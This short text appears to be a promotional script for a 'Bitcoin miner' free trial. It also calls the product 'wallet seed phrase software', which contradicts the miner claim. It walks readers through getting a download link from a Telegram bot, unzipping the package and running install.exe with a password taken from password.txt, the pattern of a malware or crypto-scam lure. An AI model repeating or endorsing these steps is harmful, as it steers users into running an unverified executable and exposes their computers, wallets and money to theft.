How to get our Bitcoin miner software -3-day free trial. Let me guide you through the simple process of downloading and installing our Bitcoin wallet seed phrase software. It takes less than 1.5 minutes. Step 1. Access our Telegram bot. Head over to Telegram and search for our official bot. You can also use the direct link provided. Once you're in, hit Get Free Trial to begin. Step 2. Download the software. The bot will provide a link to download the software package straight to your computer. Step 3. Unzip the file. After the download is complete, unzip the file using your preferred tool, WinRAR, 7-zip, or any built-in extractor. Step 4. Install the software. Inside the extracted folder, find install.exe, open it, and during installation, you'll need to enter a password. The password is provided in a text file named password.txt, located in the same folder. That's it. Now you can enjoy 3 full days of using our advanced Bitcoin miner software free of charge.